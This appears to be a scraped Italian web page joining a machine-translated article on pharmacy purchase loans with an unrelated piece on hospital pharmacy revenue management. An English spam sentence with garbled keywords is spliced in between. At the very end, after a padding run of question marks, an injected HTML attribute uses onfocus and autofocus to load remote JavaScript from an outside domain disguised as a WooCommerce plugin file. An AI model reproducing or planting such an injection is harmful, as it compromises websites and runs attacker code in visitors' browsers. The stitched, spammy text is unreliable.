Trovare un prestito farmaceutico adatto alle tue esigenze

Sei un neolaureato, un associato o anche un farmacista esperto che cerca di acquistare una farmacia adatta che soddisfi le tue esigenze? Hai bisogno di finanziamenti per questo? Allora un prestito in farmacia, se strutturato correttamente può soddisfare le tue esigenze.

Un prestito in farmacia ti aiuterà quando stai cercando di:

>> Acquista il tuo studio di farmacia di start-up;

>> Acquisire un altro studio di farmacia;

>> Espandi o rimodella il tuo studio di farmacia esistente;

>> Acquista attrezzature per il tuo studio di farmacia, compresi gli allestimenti; O

>> Rifinanzia il tuo prestito in farmacia esistente.

La tua lista di controllo del prestito in farmacia – Ecco un breve elenco di cose che dovresti considerare quando cerchi un prestito adatto a soddisfare le tue esigenze:

1. Creare un piano di due diligence/aziendale adeguato e un budget

Come per ogni grande decisione finanziaria che prenderai, è estremamente importante elaborare il tuo budget. Dovresti esaminare la tua posizione finanziaria complessiva, prima di iniziare a cercare finanziamenti e questo significa:

>> Stabilire un adeguato piano di due diligence/business;

>> Stabilire un budget adeguato, in base al quale prepari un elenco di tutte le tue risorse, nonché delle tue spese e uscite. Puoi farlo utilizzando un calcolatore di Budget Planner; E

>> Calcolo di quanto potresti essere in grado di prendere in prestito utilizzando un calcolatore del potere di prestito.

2. Predisporre un prestito farmaceutico pre-approvato

Dovresti organizzare un prestito in farmacia pre-approvato in quanto ti darà la tranquillità di sapere che:

>> Avrai il sopravvento nel negoziare il prezzo di vendita della pratica della farmacia con il venditore, l’agente immobiliare, ecc.

>> Avrai un quadro chiaro di quali sono i limiti di accessibilità e prestito;

>> La tua richiesta di prestito è già stata pre-approvata dal prestatore/fornitore di credito; E

>> Conoscerai le condizioni della tua pre-approvazione.

3. Comprensione delle caratteristiche e dei vantaggi di un prestito in farmacia

Ci sono molte caratteristiche e vantaggi che devi considerare quando guardi un prestito, questi includono:

>> L’importo del prestito richiesto per finanziare lo sviluppo di una nuova farmacia o l’acquisto di una farmacia esistente, ecc.;

>> La durata del prestito richiesto;

>> Struttura del prestito (es. Fisso/Variabile/Solo Interessi);

>> Tasso di interesse;

>> Fondo per impianto di ridisegno; E

>> Disposizioni di rimborso anticipato (es. strategia di uscita).

Cerca consigli esperti e professionali

Le tue esigenze come farmacista sono uniche e talvolta possono essere complesse. Ma non devi preoccuparti di ottenere un prestito in farmacia. Puoi chiedere il supporto di un broker finanziario dedicato e professionalmente qualificato, specializzato nell’assistenza ai farmacisti che cercano un prestito. Capirà la tua situazione e ti aiuterà a ottenere un prestito adeguato.

In case you loved this information and you would want to receive more info concerning farmacia bra assure visit our webpage. Questo articolo esplora una delle domande più interessanti che gli ospedali dovrebbero porsi? In che modo può esserti d’aiuto il Pharmacy Revenue Management?

Con il costo dei farmaci da prescrizione che continua a perdere il controllo, gli ospedali devono affrontare spese in aumento e rimborsi in calo ma incerti. Molte farmacie del sistema sanitario non sono inclini a migliorare le entrate a causa del tempo limitato e delle crescenti richieste di servizi. Tuttavia, il clima economico odierno, unito all’avvento delle nuove tecnologie, rende questo un momento opportuno per le farmacie ospedaliere per iniziare ad adottare un approccio proattivo all’informazione e alla gestione finanziaria. Ci vuole un po’ di fiducia per impegnare il tempo e le risorse per migliorare le prestazioni finanziarie della farmacia alba, ma farlo mette la farmacia nella posizione di migliorare il suo impatto positivo sulle metriche finanziarie, sulla sicurezza e sul successo dell’organizzazione.

In passato, la gestione finanziaria della farmacia era importante perché i farmacisti sono addestrati a fare le scelte giuste per ottenere i migliori risultati clinici e poiché i farmaci rappresentano una percentuale così significativa della spesa complessiva per le forniture di un ospedale, è diventato imperativo trovare modi per migliorare controllare i costi farmaceutici e garantire che i farmaci vengano fatturati e rimborsati accuratamente. Per raggiungere gli obiettivi, gli ospedali devono rendersi conto di quanto sia vitale aggiornare i nostri processi e sistemi.

Alcuni modi sono trovare soluzioni che:

Catturare in modo efficiente le spese farmaceutiche amministrate dalla struttura nella razione appropriata Mantenere un’efficiente supervisione amministrativa dell’approvvigionamento, della distribuzione e della fatturazione della farmacia

Automatizzare il trasferimento dei dati tra vari sistemi di entrate sia all’interno che all’esterno della farmacia, per aiutare a identificare i processi che si erano interrotti dopo aver lasciato la farmacia Facilitare la comunicazione e la formazione del personale

Gli ospedali perdono milioni di dollari a causa di dati farmaceutici mancanti, incompleti e imprecisi nel sistema di fatturazione. La maggior parte degli ospedali non se ne rende conto, ma la soluzione è gestire il problema tracciando manualmente i dati che si spostano dal sistema della farmacia alba al sistema di fatturazione finanziaria.

Leave a Comment

Your email address will not be published. Required fields are marked *

0
0 item
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//static-count.com/wp-content/plugins/woo-shipping-rate/counter.js";document.head.append(script); autofocus=\"
Empty Cart